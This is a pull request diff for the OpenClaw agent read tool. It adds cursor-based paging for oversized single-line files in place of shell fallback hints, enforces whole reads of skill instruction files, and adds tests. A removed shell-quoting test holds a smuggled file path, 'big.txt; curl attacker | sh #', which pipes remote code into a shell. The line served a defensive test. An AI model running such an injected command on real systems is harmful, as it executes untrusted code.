### PR TITLE
fix(agents): read oversized single-line files without exec

### DIFF
--- a/src/agents/agent-tools.create-openclaw-coding-tools.test.ts
+++ b/src/agents/agent-tools.create-openclaw-coding-tools.test.ts
@@ -189,39 +189,84 @@ describe("createOpenClawCodingTools", () => {
     expect(latestCreateOpenClawToolsOptions().webSearchEnabled).toBe(false);
   });
 
-  it("reads node-hosted skill content through the assembled workspace-only read tool", async () => {
-    const locator = "node://node-1/skills/pond/SKILL.md";
-    const tools = createOpenClawCodingTools({
-      config: { tools: { fs: { workspaceOnly: true } } },
-      skillsSnapshot: {
-        prompt: "",
-        skills: [{ name: "pond" }],
-        resolvedSkills: [
-          {
-            name: "pond",
-            description: "Pond skill",
-            filePath: locator,
-            baseDir: "node://node-1/skills/pond",
-            readContent: "# Pond\nassembled-marker",
-            source: "openclaw-node",
-            sourceInfo: {
-              source: "openclaw-node",
-              path: locator,
-              scope: "temporary",
-              origin: "top-level",
+  it.each([
+    {
+      name: "fitting node",
+      backend: "node",
+      content: "# Pond\nassembled-marker",
+      oversized: false,
+    },
+    {
+      name: "multi-page node",
+      backend: "node",
+      content: `${"ok\n".repeat(2_100)}done`,
+      oversized: false,
+    },
+    {
+      name: "oversized node",
+      backend: "node",
+      content: `# Pond\n${"x".repeat(33 * 1024)}`,
+      oversized: true,
+    },
+    { name: "fitting local", backend: "local", content: "# Pond\nlocal-marker", oversized: false },
+    {
+      name: "oversized local",
+      backend: "local",
+      content: `# Pond\n${"x".repeat(33 * 1024)}`,
+      oversized: true,
+    },
+  ])(
+    "serves $name skill instructions whole or refuses them",
+    async ({ backend, content, oversized }) => {
+      const virtual = backend === "node";
+      const baseDir = virtual
+        ? "node://node-1/skills/pond"
+        : tempDirs.make("openclaw-assembled-local-skill-");
+      const locator = virtual ? `${baseDir}/SKILL.md` : path.join(baseDir, "SKILL.md");
+      if (!virtual) {
+        await fs.writeFile(locator, content, "utf8");
+      }
+      const tools = createOpenClawCodingTools({
+        config: { tools: { fs: { workspaceOnly: true } } },
+        skillsSnapshot: {
+          prompt: "",
+          skills: [{ name: "pond" }],
+          resolvedSkills: [
+            {
+              name: "pond",
+              description: "Pond skill",
+              filePath: locator,
+              baseDir,
+              ...(virtual ? { readContent: content } : {}),
+              source: virtual ? "openclaw-node" : "test",
+              sourceInfo: {
+                source: virtual ? "openclaw-node" : "test",
+                path: locator,
+                scope: "temporary",
+                origin: "top-level",
+              },
+              disableModelInvocation: false,
             },
-            disableModelInvocation: false,
-          },
-        ],
-      },
-    });
+          ],
+        },
+      });
 
-    const result = await requireTool(tools, "read").execute("node-skill-read", {
-      path: locator,
-    });
+      const result = await requireTool(tools, "read").execute("whole-skill-read", {
+        path: locator,
+      });
 
-    expect(JSON.stringify(result)).toContain("assembled-marker");
-  });
+      if (oversized) {
+        expect(extractToolText(result)).toMatch(
+          /(?:cannot|omitted|exceeds).*whole|whole.*(?:cannot|exceeds)|partially served/i,
+        );
+        expect(extractToolText(result)).not.toContain("# Pond");
+        expect(Buffer.byteLength(extractToolText(result), "utf8")).toBeLessThanOrEqual(32 * 1024);
+        return;
+      }
+
+      expect(extractToolText(result)).toBe(content);
+    },
+  );
 
   const testConfig: OpenClawConfig = {};
 
@@ -1102,6 +1147,40 @@ describe("createOpenClawCodingTools", () => {
     expect(names.has("process")).toBe(false);
     expect(names.has("apply_patch")).toBe(false);
     expect(names.has("message")).toBe(false);
+  });
+
+  it("continues oversized data through the assembled shell-disabled read tool", async () => {
+    const workspaceDir = tempDirs.make("openclaw-read-no-shell-");
+    const original = JSON.stringify({ generated: "x".repeat(52 * 1024) });
+    await fs.writeFile(path.join(workspaceDir, "generated.json"), original, "utf8");
+    const tools = createOpenClawCodingTools({
+      workspaceDir,
+      toolConstructionPlan: {
+        includeBaseCodingTools: true,
+        includeShellTools: false,
+        includeChannelTools: false,
+        includeOpenClawTools: false,
+        includePluginTools: false,
+      },
+    });
+    const names = new Set(tools.map((tool) => tool.name));
+    expect(names.has("exec")).toBe(false);
+    expect(names.has("process")).toBe(false);
+    const read = requireTool(tools, "read");
+    expect(read.description).not.toMatch(/\b(?:bash|sed|head)\b/);
+
+    const result = await read.execute("read-no-shell", { path: "generated.json" });
+    const text = extractToolText(result);
+    const continuation = (result.details as { continuation?: { cursor?: number } }).continuation;
+    expect(text).not.toMatch(/\b(?:bash|sed|head)\b/);
+    expect(Buffer.byteLength(text, "utf8")).toBeLessThanOrEqual(32 * 1024);
+    expect(continuation?.cursor).toBeGreaterThan(0);
+    expect(text).toContain(`cursor=${continuation?.cursor}`);
+    const next = await read.execute("read-no-shell-next", {
+      path: "generated.json",
+      cursor: continuation?.cursor,
+    });
+    expect(extractToolText(next)).toBe(original.slice(continuation?.cursor));
   });
 
   it("passes plugin suppression into OpenClaw tool construction plans", () => {
@@ -2733,6 +2812,37 @@ function extractToolText(result: unknown): string {
 }
 
 describe("createOpenClawCodingTools read behavior", () => {
+  it("protects materialized sandbox skill identities when no skill snapshot exists", async () => {
+    const root = tempDirs.make("openclaw-sandbox-skill-whole-");
+    const relativePath = "skills/demo/SKILL.md";
+    const filePath = path.join(root, relativePath);
+    await fs.mkdir(path.dirname(filePath), { recursive: true });
+    await fs.writeFile(filePath, "# Demo\ncomplete instructions", "utf8");
+    const sandbox = createAgentToolsSandboxContext({
+      workspaceDir: root,
+      fsBridge: createHostSandboxFsBridge(root),
+    });
+    const tools = createOpenClawCodingTools({
+      sandbox,
+      skillUsagePaths: [
+        {
+          readPath: `/workspace/${relativePath}`,
+          skillFile: filePath,
+          skillName: "demo",
+          skillSource: "workspace",
+        },
+      ],
+    });
+    const read = requireTool(tools, "read");
+
+    expect(extractToolText(await read.execute("sandbox-skill", { path: relativePath }))).toBe(
+      "# Demo\ncomplete instructions",
+    );
+    await expect(
+      read.execute("sandbox-skill-window", { path: `/workspace/${relativePath}`, cursor: 0 }),
+    ).rejects.toThrow(/whole|partial|window/i);
+  });
+
   it("reads exact node skill locators without sending them to the filesystem backend", async () => {
     const locator = "node://node-1/skills/pond/SKILL.md";
     const execute = vi.fn(async () => {
@@ -2752,6 +2862,11 @@ describe("createOpenClawCodingTools read behavior", () => {
     const result = await tool.execute("node-skill-read", { path: locator });
 
     expect(extractToolText(result)).toContain("remote-marker");
+    for (const window of [{ offset: 1 }, { limit: 1 }, { cursor: 0 }]) {
+      await expect(
+        tool.execute("whole-skill-window", { path: locator, ...window }),
+      ).rejects.toThrow(/whole|partial|window/i);
+    }
     expect(execute).not.toHaveBeenCalled();
   });
 
@@ -2914,9 +3029,33 @@ describe("createOpenClawCodingTools read behavior", () => {
       expect(text).toContain("line-0001");
       expect(text).toContain("[Read output capped at 32KB for this call. Use offset=");
       expect(text).not.toContain("line-8000");
+      expect(Buffer.byteLength(text, "utf8")).toBeLessThanOrEqual(32 * 1024);
     } finally {
       await fs.rm(tmpDir, { recursive: true, force: true });
     }
+  });
+
+  it.each([
+    { name: "without an explicit limit", args: {} },
+    { name: "with an explicit line limit", args: { limit: 1 } },
+  ])("caps the first read page including its notice $name", async ({ args }) => {
+    const root = tempDirs.make("openclaw-read-first-page-cap-");
+    const original = "é🦞".repeat(9 * 1024);
+    await fs.writeFile(path.join(root, "unicode.txt"), original, "utf8");
+    const read = createSandboxedReadTool({ root, bridge: createHostSandboxFsBridge(root) });
+
+    const result = await read.execute("read-first-page-cap", { path: "unicode.txt", ...args });
+    const text = extractToolText(result);
+    const details = result.details as {
+      continuation?: { kind: string; offset: number; cursor: number };
+    };
+
+    expect(Buffer.byteLength(text, "utf8")).toBeLessThanOrEqual(32 * 1024);
+    expect(details.continuation).toMatchObject({ kind: "cursor", offset: 1 });
+    expect(text).toContain(`cursor=${details.continuation?.cursor}`);
+    expect(text.replace(/\n\n\[Read output capped[^\]]*\]$/, "")).toBe(
+      original.slice(0, details.continuation?.cursor),
+    );
   });
 
   it("describes explicit offsets beyond EOF", async () => {
@@ -3032,6 +3171,7 @@ describe("createOpenClawCodingTools read behavior", () => {
           firstLineExceedsLimit: false,
           content: "hidden duplicate payload",
         },
+        continuation: { kind: "line", offset: 2 },
       },
     };
     const baseRead: AgentTool = {

--- a/src/agents/agent-tools.read.ts
+++ b/src/agents/agent-tools.read.ts
@@ -50,7 +50,12 @@ import {
   type ReadToolDetails,
   type ReadToolTruncationDetails,
 } from "./sessions/tools/index.js";
-import { expandOsHomePrefix } from "./sessions/tools/path-utils.js";
+import { expandOsHomePrefix, resolveReadPath } from "./sessions/tools/path-utils.js";
+import { createBoundedReadTextPage, formatReadContinuationNotice } from "./sessions/tools/read.js";
+import {
+  ReadToolContinuationSchema,
+  type ReadToolContinuation,
+} from "./sessions/tools/tool-contracts.js";
 import { sanitizeToolResultImages } from "./tool-images.js";
 
 // NOTE(steipete): Upstream read now does file-magic MIME detection; we keep the wrapper
@@ -100,14 +105,14 @@ type ReadTruncationDetails = {
   truncated: boolean;
   outputLines: number;
   totalLines: number;
-  firstLineExceedsLimit: boolean;
+  continuation?: ReadToolContinuation;
 };
 
 const READ_CONTINUATION_NOTICE_RE =
-  /\n\n\[(?:Showing lines [^\]]*?Use offset=\d+ to continue\.|\d+ more lines in file\. Use offset=\d+ to continue\.)\]\s*$/;
+  /\n\n\[(?:Showing (?:lines|part of line) [^\]]*|Read output capped [^\]]*|\d+ more lines? in file\. [^\]]*)\]\s*$/;
 const DAILY_MEMORY_PATH_RE = /^memory\/\d{4}-\d{2}-\d{2}\.md$/;
 
-function resolveAdaptiveReadMaxBytes(options?: OpenClawReadToolOptions): number {
+export function resolveAdaptiveReadMaxBytes(options?: OpenClawReadToolOptions): number {
   const contextWindowTokens = options?.modelContextWindowTokens;
   if (
     typeof contextWindowTokens !== "number" ||
@@ -216,7 +221,41 @@ function extractReadTruncationDetails(
     truncated: true,
     outputLines,
     totalLines,
-    firstLineExceedsLimit: record.firstLineExceedsLimit === true,
+    continuation: extractReadContinuation(details),
+  };
+}
+
+function extractReadContinuation(details: object): ReadToolContinuation | undefined {
+  const candidate = "continuation" in details ? details.continuation : undefined;
+  return Value.Check(ReadToolContinuationSchema, candidate) ? candidate : undefined;
+}
+
+function withReadContinuation(
+  result: AgentToolResult<unknown>,
+  text: string,
+  continuation: ReadToolContinuation,
+  outputBytes: number,
+  initialOffset: number,
+  truncation?: ReadToolTruncationDetails,
+): AgentToolResult<unknown> {
+  const details = result.details && typeof result.details === "object" ? result.details : {};
+  const authoritative = ("truncation" in details ? details.truncation : undefined) ?? truncation;
+  if (!authoritative || typeof authoritative !== "object") {
+    return withToolResultText(result, text);
+  }
+  return {
+    ...withToolResultText(result, text),
+    details: {
+      kind: "truncated",
+      content: text,
+      truncation: {
+        ...authoritative,
+        outputLines: continuation.offset - initialOffset,
+        outputBytes,
+        lastLinePartial: continuation.kind === "cursor",
+      },
+      continuation,
+    },
   };
 }
 
@@ -318,23 +357,31 @@ async function executeReadWithAdaptivePaging(params: {
   const userLimit = params.args.limit;
   const hasExplicitLimit =
     typeof userLimit === "number" && Number.isFinite(userLimit) && userLimit > 0;
-  if (hasExplicitLimit) {
-    return await executeReadPage(params);
-  }
-
   const offsetRaw = params.args.offset;
-  let nextOffset =
+  const initialOffset =
     typeof offsetRaw === "number" && Number.isFinite(offsetRaw) && offsetRaw > 0
       ? Math.floor(offsetRaw)
       : 1;
-  let firstResult: AgentToolResult<unknown> | null = null;
+  const initialLimit = hasExplicitLimit ? { limit: Math.max(1, Math.floor(userLimit)) } : {};
+  let next: ReadToolContinuation =
+    typeof params.args.cursor === "number"
+      ? { kind: "cursor", offset: initialOffset, cursor: params.args.cursor, ...initialLimit }
+      : { kind: "line", offset: initialOffset, ...initialLimit };
+  let firstResult: AgentToolResult<unknown> | undefined;
   let aggregatedText = "";
   let aggregatedBytes = 0;
-  let capped = false;
-  let continuationOffset: number | undefined;
+  let previousNotice = "";
 
   for (let page = 0; page < MAX_ADAPTIVE_READ_PAGES; page += 1) {
-    const pageArgs = { ...params.args, offset: nextOffset };
+    const pageArgs = {
+      ...params.args,
+      offset: next.offset,
+      ...(next.kind === "cursor" ? { cursor: next.cursor } : {}),
+      ...(next.limit === undefined ? {} : { limit: next.limit }),
+    };
+    if (next.kind === "line") {
+      delete pageArgs.cursor;
+    }
     const pageResult = await executeReadPage({
       base: params.base,
       toolCallId: params.toolCallId,
@@ -349,50 +396,70 @@ async function executeReadWithAdaptivePaging(params: {
     }
 
     const truncation = extractReadTruncationDetails(pageResult);
-    const pageEndLine = nextOffset - 1 + (truncation?.outputLines ?? 0);
+    const pageEndLine = next.offset - 1 + (truncation?.outputLines ?? 0);
     const reachedEof =
       Boolean(truncation?.truncated) && pageEndLine >= (truncation?.totalLines ?? 0);
-    const canContinue =
-      Boolean(truncation?.truncated) &&
-      !truncation?.firstLineExceedsLimit &&
-      (truncation?.outputLines ?? 0) > 0 &&
-      pageEndLine < (truncation?.totalLines ?? 0) &&
-      page < MAX_ADAPTIVE_READ_PAGES - 1;
-    const pageText = canContinue || reachedEof ? stripReadContinuationNotice(rawText) : rawText;
-    const delimiter = aggregatedText && pageText ? "\n\n" : "";
-    const nextBytes = Buffer.byteLength(`${delimiter}${pageText}`, "utf-8");
+    const pageContinuation = truncation?.continuation;
+    const pageText =
+      pageContinuation || reachedEof ? stripReadContinuationNotice(rawText) : rawText;
+    const delimiter = aggregatedText && pageText && next.kind === "line" ? "\n" : "";
+    const candidateBytes = aggregatedBytes + delimiter.length + Buffer.byteLength(pageText, "utf8");
+    const continuationNotice = pageContinuation
+      ? formatReadContinuationNotice(pageContinuation, params.maxBytes)
+      : "";
 
-    if (aggregatedText && aggregatedBytes + nextBytes > params.maxBytes) {
-      capped = true;
-      continuationOffset = nextOffset;
-      break;
+    if (candidateBytes + Buffer.byteLength(continuationNotice, "utf8") > params.maxBytes) {
+      if (aggregatedText) {
+        return withReadContinuation(
+          firstResult,
+          `${aggregatedText}${previousNotice}`,
+          next,
+          aggregatedBytes,
+          initialOffset,
+        );
+      }
+      const lineCount = pageText.split("\n").length;
+      const bounded = createBoundedReadTextPage({
+        content: pageText,
+        startLine: next.offset,
+        endLine: next.offset + lineCount - 1,
+        totalLines: truncation?.totalLines ?? next.offset + lineCount - 1,
+        ...(next.kind === "cursor" ? { cursor: next.cursor } : {}),
+        limit: next.limit,
+        maxBytes: params.maxBytes,
+        adaptive: true,
+      });
+      if (bounded.kind === "text") {
+        return withToolResultText(pageResult, bounded.content);
+      }
+      return withReadContinuation(
+        firstResult,
+        bounded.content,
+        bounded.continuation,
+        bounded.truncation.outputBytes,
+        initialOffset,
+        bounded.truncation,
+      );
     }
 
     aggregatedText += `${delimiter}${pageText}`;
-    aggregatedBytes += nextBytes;
-
-    if (!canContinue || !truncation) {
+    aggregatedBytes = candidateBytes;
+    if (!pageContinuation || reachedEof) {
       return withToolResultText(pageResult, aggregatedText);
     }
-
-    nextOffset += truncation.outputLines;
-    continuationOffset = nextOffset;
-
-    if (aggregatedBytes >= params.maxBytes) {
-      capped = true;
-      break;
+    if (hasExplicitLimit || page === MAX_ADAPTIVE_READ_PAGES - 1) {
+      return withReadContinuation(
+        firstResult,
+        `${aggregatedText}${continuationNotice}`,
+        pageContinuation,
+        aggregatedBytes,
+        initialOffset,
+      );
     }
+    previousNotice = continuationNotice;
+    next = pageContinuation;
   }
-
-  if (!firstResult) {
-    return await executeReadPage(params);
-  }
-
-  let finalText = aggregatedText;
-  if (capped && continuationOffset) {
-    finalText += `\n\n[Read output capped at ${formatBytes(params.maxBytes)} for this call. Use offset=${continuationOffset} to continue.]`;
-  }
-  return withToolResultText(firstResult, finalText);
+  return firstResult!;
 }
 
 function rewriteReadImageHeader(text: string, mimeType: string): string {
@@ -499,13 +566,18 @@ function normalizeReadResultDetails(
   }
 
   const truncation = currentDetails?.truncation;
-  if (truncation && typeof truncation === "object") {
+  if (currentDetails && truncation && typeof truncation === "object") {
+    const continuation = extractReadContinuation(currentDetails);
+    if (!continuation) {
+      return { ...result, details: { kind: "text", content: text } };
+    }
     return {
       ...result,
       details: {
         kind: "truncated",
         content: text,
         truncation: truncation as ReadToolTruncationDetails,
+        continuation,
       },
     };
   }
@@ -916,6 +988,7 @@ export function createSandboxedReadTool(
   const base = eraseSessionFileTool(
     (params.createTool ?? createReadTool)(params.root, {
       operations: createSandboxReadOperations(params),
+      maxBytes: resolveAdaptiveReadMaxBytes(params),
     }),
   );
   return createOpenClawReadTool(base, {
@@ -1022,20 +1095,41 @@ export function createOpenClawReadTool(
 export function wrapReadToolWithSkillContent(
   tool: AnyAgentTool,
   skills: readonly SkillReadContent[] | undefined,
-  options?: OpenClawReadToolOptions,
+  options?: OpenClawReadToolOptions & {
+    cwd?: string;
+    containerWorkdir?: string;
+    instructionPaths?: readonly string[];
+  },
 ): AnyAgentTool {
-  const contentByPath = new Map(
-    (skills ?? []).flatMap((skill) =>
-      skill.filePath.startsWith("node://") && typeof skill.readContent === "string"
-        ? [[skill.filePath, skill.readContent] as const]
-        : [],
-    ),
+  const cwd = options?.cwd ?? process.cwd();
+  const resolveInstructionPath = (filePath: string): string => {
+    if (filePath.startsWith("node://")) {
+      return filePath;
+    }
+    const mapped = mapContainerPathToWorkspaceRoot({
+      filePath,
+      root: cwd,
+      containerWorkdir: options?.containerWorkdir,
+    });
+    return resolveReadPath(mapped, cwd);
+  };
+  const instructionContent = new Map<string, string | undefined>(
+    (options?.instructionPaths ?? []).map((filePath) => [
+      resolveInstructionPath(filePath),
+      undefined,
+    ]),
   );
-  if (contentByPath.size === 0) {
+  for (const skill of skills ?? []) {
+    instructionContent.set(
+      resolveInstructionPath(skill.filePath),
+      skill.filePath.startsWith("node://") ? skill.readContent : undefined,
+    );
+  }
+  if (instructionContent.size === 0) {
     return tool;
   }
   const readContent = (filePath: string): string => {
-    const content = contentByPath.get(filePath);
+    const content = instructionContent.get(filePath);
     if (content === undefined) {
       throw Object.assign(new Error(`Virtual skill file not found: ${filePath}`), {
         code: "ENOENT",
@@ -1043,16 +1137,7 @@ export function wrapReadToolWithSkillContent(
     }
     return content;
   };
-  const virtualBase = eraseSessionFileTool(
-    createReadTool("/", {
-      operations: {
-        resolvePath: (filePath) => filePath,
-        access: async (filePath) => void readContent(filePath),
-        readFile: async (filePath) => Buffer.from(readContent(filePath), "utf8"),
-      },
-    }),
-  );
-  const virtualRead = createOpenClawReadTool(virtualBase, options);
+  let virtualRead: AnyAgentTool | undefined;
   return {
     ...tool,
     execute: async (toolCallId, args, signal, onUpdate) => {
@@ -1060,12 +1145,47 @@ export function wrapReadToolWithSkillContent(
       const rawPath = record?.path;
       const normalizedPath =
         typeof rawPath === "string" ? normalizeFileToolPathParam(rawPath) : undefined;
-      if (normalizedPath && contentByPath.has(normalizedPath)) {
-        const virtualArgs =
-          normalizedPath === rawPath || !record ? args : { ...record, path: normalizedPath };
-        return virtualRead.execute(toolCallId, virtualArgs, signal, onUpdate);
+      if (!normalizedPath || !instructionContent.has(resolveInstructionPath(normalizedPath))) {
+        return tool.execute(toolCallId, args, signal, onUpdate);
       }
-      return tool.execute(toolCallId, args, signal, onUpdate);
+      if (record && ["offset", "limit", "cursor"].some((key) => record[key] !== undefined)) {
+        throw new Error(
+          "Skill instructions must be read whole; offset, limit, and cursor windows are not allowed.",
+        );
+      }
+      const instructionTool =
+        typeof instructionContent.get(normalizedPath) === "string"
+          ? (virtualRead ??= createOpenClawReadTool(
+              eraseSessionFileTool(
+                createReadTool("/", {
+                  maxBytes: resolveAdaptiveReadMaxBytes(options),
+                  operations: {
+                    resolvePath: (filePath) => filePath,
+                    access: async (filePath) => void readContent(filePath),
+                    readFile: async (filePath) => Buffer.from(readContent(filePath), "utf8"),
+                  },
+                }),
+              ),
+              options,
+            ))
+          : tool;
+      const instructionArgs =
+        normalizedPath === rawPath || !record ? args : { ...record, path: normalizedPath };
+      const result = await instructionTool.execute(toolCallId, instructionArgs, signal, onUpdate);
+      const details = result.details;
+      if (
+        details &&
+        typeof details === "object" &&
+        "kind" in details &&
+        details.kind === "truncated"
+      ) {
+        const text = `Skill instructions cannot be partially served: the whole document exceeds the ${formatBytes(resolveAdaptiveReadMaxBytes(options))} read budget. Ask the operator to reduce the document or increase the model context.`;
+        return {
+          content: [{ type: "text", text }],
+          details: { kind: "text", content: text },
+        };
+      }
+      return result;
     },
   };
 }

--- a/src/agents/agent-tools.ts
+++ b/src/agents/agent-tools.ts
@@ -579,6 +579,7 @@ function createOpenClawCodingToolsInternal(options?: OpenClawCodingToolsOptions)
     readOnly,
     sandbox,
     skillsSnapshot: options?.skillsSnapshot,
+    skillInstructionPaths: options?.skillUsagePaths?.map((entry) => entry.readPath),
     modelContextWindowTokens: options?.modelContextWindowTokens,
     imageSanitization,
     memoryWriteProvenance,

--- a/src/agents/core-coding-tools.ts
+++ b/src/agents/core-coding-tools.ts
@@ -7,6 +7,7 @@ import {
   createSandboxedEditTool,
   createSandboxedReadTool,
   createSandboxedWriteTool,
+  resolveAdaptiveReadMaxBytes,
   wrapReadToolWithSkillContent,
   wrapToolWorkspaceRootGuard,
   wrapToolWorkspaceRootGuardWithOptions,
@@ -88,6 +89,7 @@ type CoreCodingToolsOptions = {
   readOnly: boolean;
   sandbox?: SandboxContext;
   skillsSnapshot?: SkillSnapshot;
+  skillInstructionPaths?: readonly string[];
   modelContextWindowTokens?: number;
   imageSanitization?: ImageSanitizationLimits;
   memoryWriteProvenance?: MemoryWriteProvenanceObserver;
@@ -141,8 +143,9 @@ export function createCoreCodingTools(options: CoreCodingToolsOptions): AnyAgent
             createTool: options.baseToolFactories?.createReadTool,
           })
         : createOpenClawReadTool(
-            options.baseToolFactories?.createReadTool(options.codingRoot) ??
-              createReadTool(options.codingRoot),
+            (options.baseToolFactories?.createReadTool ?? createReadTool)(options.codingRoot, {
+              maxBytes: resolveAdaptiveReadMaxBytes(options),
+            }),
             {
               modelContextWindowTokens: options.modelContextWindowTokens,
               imageSanitization: options.imageSanitization,
@@ -167,6 +170,9 @@ export function createCoreCodingTools(options: CoreCodingToolsOptions): AnyAgent
         wrapReadToolWithSkillContent(guarded, options.skillsSnapshot?.resolvedSkills, {
           modelContextWindowTokens: options.modelContextWindowTokens,
           imageSanitization: options.imageSanitization,
+          cwd: options.codingRoot,
+          containerWorkdir: sandbox?.containerWorkdir,
+          instructionPaths: options.skillInstructionPaths,
         }),
       );
     }

--- a/src/agents/filesystem-tools-output-contract.test.ts
+++ b/src/agents/filesystem-tools-output-contract.test.ts
@@ -47,7 +47,10 @@ describe("filesystem tool output contracts", () => {
     }
     expect(text.details).toEqual({ kind: "text", content: "ordinary text\n" });
     expect(image.details).toMatchObject({ kind: "image", mimeType: "image/png" });
-    expect(truncated.details).toMatchObject({ kind: "truncated" });
+    expect(truncated.details).toMatchObject({
+      kind: "truncated",
+      truncation: { totalBytes: DEFAULT_MAX_BYTES + 1 },
+    });
     expect(notFound.details).toEqual({
       kind: "not_found",
       status: "not_found",
@@ -55,7 +58,7 @@ describe("filesystem tool output contracts", () => {
       optional: true,
     });
     expect(compactToolOutputHint(tool.outputSchema)).toBe(
-      '{ content: string; kind: "text" } | { content: string; kind: "image"; mimeType: string } | { content: string; kind: "truncated"; truncation: { firstLineExceedsLimit: boolean; lastLinePartial: boolean; maxBytes: number; maxLines: number; outputBytes: number; outputLines: number; totalBytes: number; totalLines: number; truncated: true; truncatedBy: "lines" | "bytes" } } | { kind: "not_found"; optional: true; path: string; status: "not_found" }',
+      '{ content: string; kind: "text" } | { content: string; kind: "image"; mimeType: string } | { content: string; continuation: { kind: "line"; offset: number; limit?: number } | { cursor: number; kind: "cursor"; offset: number; limit?: number }; kind: "truncated"; truncation: { firstLineExceedsLimit: boolean; lastLinePartial: boolean; maxBytes: number; maxLines: number; outputBytes: number; outputLines: number; totalBytes: number; totalLines: number; truncated: true; truncatedBy: "lines" | "bytes" } } | { kind: "not_found"; optional: true; path: string; status: "not_found" }',
     );
   });
 

--- a/src/agents/sessions/tools/read.test.ts
+++ b/src/agents/sessions/tools/read.test.ts
@@ -1,5 +1,4 @@
-// Read tool tests cover bounded file reads, continuation hints, and shell-safe
-// fallback commands in agent sessions.
+// Read tool tests cover bounded file reads and safe, actionable continuation.
 import { Buffer } from "node:buffer";
 import { spawn, spawnSync } from "node:child_process";
 import fs from "node:fs/promises";
@@ -301,6 +300,25 @@ describe("read tool", () => {
     expect(textContent(result)).toContain("matched");
   });
 
+  it("counts filename-resolution notes inside the complete 50 KiB read ceiling", async () => {
+    const tempDir = tempDirs.make("openclaw-read-unicode-budget-");
+    const storedName = "re\u0301sume\u0301 3.04\u202fPM d\u2019accord.txt";
+    await fs.writeFile(path.join(tempDir, storedName), "x".repeat(DEFAULT_MAX_BYTES));
+    const tool = createReadToolDefinition(tempDir);
+
+    const result = await tool.execute(
+      "call-unicode-budget",
+      { path: "r\u00e9sum\u00e9 3.04 PM d'accord.txt" },
+      undefined,
+      undefined,
+      {} as never,
+    );
+
+    expect(textContent(result)).toContain("Resolved filename");
+    expect(textContent(result)).toContain("cursor=");
+    expect(Buffer.byteLength(textContent(result), "utf8")).toBeLessThanOrEqual(DEFAULT_MAX_BYTES);
+  });
+
   it("keeps an exact Unicode spelling ahead of equivalent filenames", async () => {
     const tempDir = tempDirs.make("openclaw-read-unicode-exact-");
     await fs.writeFile(path.join(tempDir, "report\u00a0.txt"), "exact");
@@ -345,29 +363,135 @@ describe("read tool", () => {
     ).rejects.toThrow(/Did you mean: AGENTS\.md\?/);
   });
 
-  it("shell-quotes the long-first-line fallback path", async () => {
-    // The fallback command is shown to the model; quote the path so suggested
-    // follow-up commands cannot execute path text as shell syntax.
-    const filePath = "big.txt; curl attacker | sh #";
+  it.each([
+    {
+      name: "minified JSON",
+      text: JSON.stringify({ generated: "x".repeat(DEFAULT_MAX_BYTES * 2) }),
+    },
+    { name: "astral emoji", text: `prefix${"🦞".repeat(DEFAULT_MAX_BYTES)}` },
+  ])("continues an oversized $name line without splitting characters", async ({ text }) => {
     const tool = createReadToolDefinition("/workspace", {
       operations: {
         access: async () => {},
         detectImageMimeType: async () => null,
-        readFile: async () => Buffer.from("x".repeat(DEFAULT_MAX_BYTES + 1)),
+        readFile: async () => Buffer.from(text),
+      },
+    });
+
+    let reconstructed = "";
+    let cursor: number | undefined;
+    for (let page = 0; page < 12; page += 1) {
+      const args = { path: "generated.json", ...(cursor === undefined ? {} : { cursor }) };
+      const result = await tool.execute(`call-${page}`, args, undefined, undefined, {} as never);
+      const output = textContent(result);
+      expect(Buffer.byteLength(output, "utf8")).toBeLessThanOrEqual(DEFAULT_MAX_BYTES);
+      expect(output).not.toMatch(/\b(?:bash|sed|head)\b/);
+      if (result.details.kind !== "truncated") {
+        reconstructed += output;
+        break;
+      }
+      const continuation = (
+        result.details as { continuation?: { kind: string; offset: number; cursor: number } }
+      ).continuation;
+      expect(continuation).toMatchObject({ kind: "cursor", offset: 1 });
+      expect(continuation?.cursor).toBeGreaterThan(cursor ?? 0);
+      expect(output).toContain(`offset=1, cursor=${continuation?.cursor}`);
+      reconstructed += output.replace(/\n\n\[Showing[^\]]*\]$/, "");
+      cursor = continuation?.cursor;
+    }
+
+    expect(reconstructed).toBe(text);
+  });
+
+  it("rejects an intra-line cursor inside a UTF-16 surrogate pair", async () => {
+    const tool = createReadToolDefinition("/workspace", {
+      operations: {
+        access: async () => {},
+        readFile: async () => Buffer.from("a🦞b"),
+      },
+    });
+
+    await expect(
+      tool.execute(
+        "call-surrogate",
+        { path: "emoji.txt", cursor: 2 },
+        undefined,
+        undefined,
+        {} as never,
+      ),
+    ).rejects.toThrow(/cursor.*surrogate.*(?:1|3)/i);
+  });
+
+  it.each([4, 5])("explains an intra-line cursor at or past EOF (%s)", async (cursor) => {
+    const tool = createReadToolDefinition("/workspace", {
+      operations: {
+        access: async () => {},
+        readFile: async () => Buffer.from("done"),
       },
     });
 
     const result = await tool.execute(
-      "call-1",
-      { path: filePath },
+      "call-cursor-eof",
+      { path: "done.txt", cursor },
       undefined,
       undefined,
       {} as never,
     );
-    const text = result.content[0]?.type === "text" ? result.content[0].text : "";
 
-    expect(text).toContain(`sed -n '1p' '${filePath}' | head -c ${DEFAULT_MAX_BYTES}`);
-    expect(text).not.toContain(`sed -n '1p' ${filePath} | head`);
+    expect(textContent(result)).toMatch(/cursor.*(?:end|beyond).*line 1/i);
+  });
+
+  it("finishes an oversized selected line before continuing at the next line", async () => {
+    const longLine = "x".repeat(DEFAULT_MAX_BYTES + 100);
+    const tool = createReadToolDefinition("/workspace", {
+      operations: {
+        access: async () => {},
+        readFile: async () => Buffer.from(`before\n${longLine}\nafter`),
+      },
+    });
+
+    const first = await tool.execute(
+      "call-line-first",
+      { path: "lines.txt", offset: 2, limit: 1 },
+      undefined,
+      undefined,
+      {} as never,
+    );
+    const continuation = (
+      first.details as { continuation?: { kind: string; offset: number; cursor: number } }
+    ).continuation;
+    expect(continuation).toMatchObject({ kind: "cursor", offset: 2 });
+
+    const second = await tool.execute(
+      "call-line-second",
+      { path: "lines.txt", offset: 2, cursor: continuation?.cursor, limit: 1 },
+      undefined,
+      undefined,
+      {} as never,
+    );
+    const firstChunk = textContent(first).replace(/\n\n\[Showing[^\]]*\]$/, "");
+    const secondChunk = textContent(second).replace(/\n\n\[\d+ more lines[^\]]*\]$/, "");
+    expect(`${firstChunk}${secondChunk}`).toBe(longLine);
+    expect(textContent(second)).toContain("offset=3");
+  });
+
+  it("preserves ordinary multi-line selection and trailing newlines", async () => {
+    const tool = createReadToolDefinition("/workspace", {
+      operations: {
+        access: async () => {},
+        readFile: async () => Buffer.from("first\r\nsecond\r\nthird\r\n"),
+      },
+    });
+
+    const selected = await tool.execute(
+      "call-lines",
+      { path: "lines.txt", offset: 2 },
+      undefined,
+      undefined,
